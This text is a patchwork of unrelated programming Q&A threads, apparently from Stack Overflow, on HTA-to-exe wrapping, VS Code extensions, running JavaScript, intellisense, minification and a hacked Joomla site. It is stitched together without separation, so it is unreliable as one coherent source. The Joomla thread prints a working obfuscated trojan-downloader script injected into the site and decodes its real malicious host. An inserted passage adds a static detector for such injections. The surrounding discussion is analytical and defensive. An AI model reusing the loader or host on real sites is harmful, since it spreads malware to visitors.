I have searched far and wide for a way to compile my .hta file (and resources) to a .exe file.
There are plenty of applications that claim to be able to do this - but they have not worked for this application - which is a mixture of javascript and VB.
Simply, (and naively,) I don't want people looking at / screwing with the code. Any suggestions or solutions would be greatly appreciated.
EDIT: Of course, I understand that javascript and VB are not "compilable" since they are interpreted languages. I am just looking for a way to truly hide the source.
HTAEdit, which comes bundled with VBSedit, does not truly hide the hta code. At run time, it extracts the original hta file to a subdirectory in %temp% and passes it off to mshta.exe to execute. The converted exe's created by VBSedit don't seem to do this as far as I can tell.
Try using VBSedit, it definitely works for converting both vbs and hta to exe
You can "compile to exe" by simply wrapping the HTA into an executable which knows how to setup the HTA context/window.
The most trivial approach (which sounds like ExeScript) is to simply extract the HTA/resources first and then execute them. One could theoretically do this without temporary files by injecting data into a running IE context, but the task becomes more difficult. The internal JS may or may not be obfuscated and the wrapper may or may not add an additional layer of obfuscation/"encryption". (PayMo, and I am sure there are others, uses a wrapped context approach to distribute a single runnable exe).
If protecting "intellectual property" is the goal, hire a good lawyer :-)
I'm not sure about compiling to an exe - but if you minify & obfuscate your source code, unless you've got something incredibly valuable, it'd be a huge job to reverse-engineer.
http://developer.yahoo.com/yui/compressor/
Good luck.
You don't need a compiler, you need an encryptor/decryptor, like my project (under construction), the CFS project (Cryptographica File Security).
My clue is to create VBScript or JScript file for HTA to be dynamically spawned by. So you compile not HTA, but the script. This approach meets your security requirements much better than HTA packed to SFX.
Prepare the resources first - import to HTA all external files: scripts, stylesheets, and images (base64-encoded), to make your HTA standalone app. Then create eg VBScript file, and copy all HTML content from your HTA to the string variable in the script, replacing new line and tab symbols to " & vbCrLf & " and " & vbTab & ". Add code to create HTA window dynamically, .write() that string variable to the window's document, and quit script.
Note that Window_OnLoad() may not work properly due to pushing the content to window, that was already loaded.
Then just encrypt your completed VBScript to exe (using true encrypting utility, eg Primal Script 2012, ExeScript, VbsEdit or ScriptCryptor). And change icon with PE Explorer.
All that will take some time, but it is worth doing.
UPD: Here is an example of prepared script by the link.
I have a question. I used vs code for python and I used some extensions for python like the python extension from microsoft. I currently want to use vs code for html,css and javascript. Does the pythons extensions affect my work in other languages and html and css? Do I need to disable them?
No. Extensions for languages are usually associated with a file type (.py, .css, etc.).
If the extensions you want to install in vscode don't depend on each other they will have separated inner routines and frameworks. So no "collisions" or anything like that. In case of python you can have different environments per projects which can be tricky to handle. To learn more about that have a look at pyvenv or virtual environment.
It will have no effect, you don't need to disable it, because the extension only runs if you use a file format with .py
If your files are separated with their respective file type names attached (i.e. .css, .scss, .sass, .html, .py) the extensions designed for Python would theoretically only affect the Python files. If it's a really bad extension with low reviews maybe it would have a bug, but this is highly doubtful if you stick to highly-rated plugins. Simple.
No, they will not affect anything. Because they are built to execute just with python files, any file that doesn't have (.py) at the end will not be affected.
Ok, recently I started doing some tutorials in javascript. Soon I had finished doing some coding on notepad, saved it as " .js" but when I tried to open it I could not find a suitable program, hopefully, someone can tell me a method of running the code.
The first thing I did was try and download java, but quit the installer after seeing the ad based installer including vosteran, a web browser hijacker which I have had some experience with. Finally, is it necessary to download notepad ++ for this?
Thanks
It seems that you don't have a clear understanding of JavaScript and how it interacts with HTML. Java and JavaScript are two completely different languages.
.js files are usually linked within a .html file or some server side language file, i.e. .php, .aspx. And the HTML file is opened with your browser, for example, Internet Explorer, Google Chrome or Firefox.
You should include the .js file in your HTML file using:
<script src="yourscript.js"></script>
Within the HTML file you can then invoke the methods and use the variables declared in your custom .js file.
You run js files in a webbrowser. Include files between tags.
Example:
There are two main options of running Javascript
1 In the browser
2 Or as a process
Choosing which one depends on your code. Please post an example of what you are working on.
If your code fits option 1, then you will just need a small HTML file that includes reference to your javascript file.
If your code is not meant for a browser, you will likely need to install Nodejs. This is a CommonJS implementation of server-side js.
A note on Java and Javascript. They are in no way related. Netscape licensed the name from makers of Java and renamed language to Javascript in hopes it would inherit some of Java's popularity.
I have a website with very heavy (long javascript > 100KB + JQuery). So, for making the javascript re-useable, I want to separate the logic in different javascript files.
So, I want to make an aggregated javascript file
Please tell me how (I even want to use the VS2010 intellisense in my main JS file about the functions of the other JS files.)
Javascript Intellisense tends to be extremely unreliable as some updates broke it some updates fixed it, and there are a lot of extensions around it, breaking each other.
Still there is a /// <reference> element for cases like this.
See MSDN article and add line:
/// <reference path="otherscript.js" />
at the top of your script file.
Try to test it with the jQuery vsdoc and your other script files.
Also installing MVC4 installed some dependency or whatever that more-or-less fixed javascript intellisense for me.
I would recommend Resharper: http://www.jetbrains.com/resharper/whatsnew/
You can separate your Javascript files and use SquishIt to concatenate and compress/minify them all into one single file to reduce the file size and the number of requests.
I don't know of any solution that allows you to work in both the concatenated file as well as each separated file ...and I don't understand why anyone would want to.
IMO, Visual Studio has a quite poor intellisense for Javascript.
I have a fairly stand-alone page, and I'd like to make it as small as possible: inline minimized Javascript and minimized CSS, and then minimize the HTML itself. There's tools for each of these parts, but I'd like to avoid writing the glue for putting all of these together. Open source would be ideal.
try http://code.google.com/p/htmlcompressor/
EDIT
Although doing it will make the code reading part a lot more complex and as a result, debugging will be a big pain. Do it only after you have all the other required optimization in place.
I'm not sure if you're going to find one tool that does all, but I've seen a few that do get a decent job done..... for me normally combined with other tools though.
http://code.google.com/speed/page-speed/
Page speed is a firefox plugin, and is also an apache module
When you run Page Speed against a page referencing HTML files, it automatically runs the Page Speed HTML compactor (which will in turn apply JSMin and cssmin.js to any inline JavaScript and CSS) on the files and saves the minified output to a configurable directory
Check out the Pretty Diff tool at http://prettydiff.com/?m=minify&html
You can also tell the tool to point to a given page with the s parameter, such as:
http://prettydiff.com/?m=minify&html&s=https://stackoverflow.com/
My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.
My question is, how does this rubbish work? I look at it and I just don't see how does this manage to do any harm? What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and after opening will freeze up your Acrobat and wreak havoc on your machine. How does it do that, I don't know, I don't care. But how does the following piece of script invoke the download?
<script>/*Exception*/ document.write('<script src='+'h#^(t#)((t$&#p#:)&/!$/)#d$y#^#$n#$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^#g))!a#m##$e&$s^##!t##($!o#$p(.&#c&)#(o$m)).!$m$)y#(b#e()s&$t$#y&o$&(u#)$x&&^(i)-#^c!!&n$#.(#g)$e#(^n&!u(i&#&n(e&(!h&o#&^&l^$(l)&y$(##w!o#!((o#d&^.^#)r$#^u!!$:(##&8#)(0$8#&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c#o!&^m#&/&(s&$(o!f&!t#&o!!n)&i$&c!.#^^c)!$o##((m##/$^!g#^o$^&o&#g!l)###!e&.))c!)(o###^!m(&/^^l#^#i##(v&#e&)!$j^!a#$s#m!i)n$.!$c&$o)#$m^/#$v&i^d^()e(!o&&s#(z(#)^.#)c$&o^m)$)^/#$'.replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan
Notice the replace call after the giant messy string: .replace(/#|\$|#|\^|&|\(|\)|\!/ig, '').
It removes most of the special characters, turning it into a normal URL:
evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
(I manually changed http: to evil:)
Note that the regex could have been simplified to .replace(/[#$#^&()!]/ig, '')
If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.
I requested that page in Fiddler, and it had no content.
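The replace trick described above can be undone statically, without loading or evaluating the injected script. The following is an added example, not part of the original answers: it scans text for a quoted string followed by `.replace(/.../, '')`, applies the same substitution, and reports any decoded URL in defanged form. The sample input is constructed and uses the reserved name example.test; the function names are hypothetical.

```javascript
// Static analysis only: the injected snippet is handled as text and never evaluated.

// Constructed sample in the same shape as the injection discussed on this page
// (junk characters interleaved into a script URL). example.test is a reserved name.
const SAMPLE =
  "<script>/*x*/ document.write('<script src='+'h#^t(t$p!:&/)/e#x^a$m&p(l)e!.#t^e$s&t(:)8!0#8^0$/&a(.)j!s'" +
  ".replace(/#|\\$|#|\\^|&|\\(|\\)|\\!/ig, '')+' defer=defer></scr'+'ipt>');</script>";

// Matches: 'string literal'.replace(/pattern/flags, '')
const JUNK_REPLACE =
  /'((?:[^'\\]|\\.)*)'\s*\.replace\(\s*\/((?:[^\/\\]|\\.)+)\/([a-z]*)\s*,\s*(?:''|"")\s*\)/g;

// Make a URL safe to paste into tickets and reports.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Returns [{ offset, decoded }] for every junk-padded literal that decodes to a URL.
function findJunkPaddedUrls(source) {
  const findings = [];
  for (const m of source.matchAll(JUNK_REPLACE)) {
    const [, literal, pattern, flags] = m;
    if (pattern.length > 200) continue; // do not compile oversized hostile patterns
    let re;
    try {
      // Force the global flag so every junk character is stripped.
      re = new RegExp(pattern, flags.includes('g') ? flags : flags + 'g');
    } catch (e) {
      continue; // pattern or flags are not valid; skip this candidate
    }
    const decoded = literal.replace(re, '');
    // Report only when stripping changed the string and the result looks like a URL.
    if (decoded !== literal && /^[a-z][a-z0-9+.-]*:\/\//i.test(decoded)) {
      findings.push({ offset: m.index, decoded: defang(decoded) });
    }
  }
  return findings;
}

console.log(findJunkPaddedUrls(SAMPLE));
```

Running the same function over the contents of each PHP or HTML file on the site gives a quick list of which files carry this kind of injection and where.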
These answers might help you understand the nature of the malicious JavaScript code but what you should be looking for is a way to close the loophole inherent in the Joomla engine. Pre-packaged frameworks are prone to loopholes, either intentional or unintentional, especially when you take into consideration that they are engineered to work on unix, mac and windows environments.
My work requires I run many domains, applications and frameworks on many types of servers and systems for clients and myself. Over time I've seen more and more bots crawling these systems looking for known loopholes/entrances by-way of back-door entrances created by those frameworks. Good thing when I use any type of framework, which I seldom do, I make sure to rename most if not the entire file structure to rid myself of those pesky loopholes/back-doors. At the very least you can rename directories which will throw off most bots, but my way is to completely eliminate references that give clues as to the nature of the framework, which includes renaming of the entire file structure not just directories. Always keep a map of the new naming conventions relative to the old naming conventions in order to make adding plug-ins to your base framework a snap. Once you get the hang of this you can go as far as programmatically renaming the entire framework filestructure for quicker results, this is especially useful when having to deal with clients needing to be able to update their framework with plug-ins and the like.
It just does a regex replace on the script url to give you
NOTE: DO NOT FOLLOW THE BELOW LINK (inserted ** to deter the copy-pasters)
http**://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
as the src
It uses the replace function to replace the rubbish chars using regex, nothing wrong with the code:
........replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')
It loads the script from
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
And that script loads an iframe, with visibility hidden, from
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/index.php?ys
When you read the whole thing, you find that it is a string followed by a replace command.
My two cents. Have you / can you install a Joomla backup tool such as Joomlapack?
I've set it to run via a cron script to keep the goods handy in case the muggers get to mugging.
What version of Joomla are you running?
1.0.X versions aren't being updated any longer, and its age is really starting to show. You owe it to yourself to do a backup and plan to upgrade to 1.5 and anticipate the wonders of 1.6